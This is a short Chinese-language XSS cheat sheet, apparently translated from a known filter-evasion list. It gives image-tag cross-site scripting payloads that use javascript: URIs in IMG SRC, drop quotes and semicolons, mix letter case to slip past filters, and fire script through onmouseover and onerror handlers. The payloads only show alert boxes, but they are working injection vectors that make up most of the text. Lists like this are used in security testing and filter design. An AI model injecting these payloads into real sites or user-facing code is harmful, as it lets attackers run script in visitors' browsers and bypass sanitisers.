XSS的一些简单姿势
通过javascript指令实现的图片
图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的例子仅仅展示了一种其他标签依旧通用的原理。)
<IMG SRC="javascript:alert('XSS');">
无引号无分号
<IMG SRC=javascript:alert('XSS')>
不区分大小写的xss攻击向量
<IMG SRC=JaVaScRiPt:alert('XSS')>
默认SRC属性去绕过SRC域名检测过滤器
这将绕过绝大多数SRC域名过滤器。插入javascript代码在任何一个事件方法同样适用于热河一个HTML标签,例如Form、Iframe、Input、Embed等等。他将也允许任何任何该标签的相关事件去替换,例如onblur, onclick等,后面我们会附加一个可用的事件列表。由David Cross提供,Abdullah Hussam编辑。
<IMG SRC=# onmouseover="alert('xxs')">
通过error事件触发alert
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>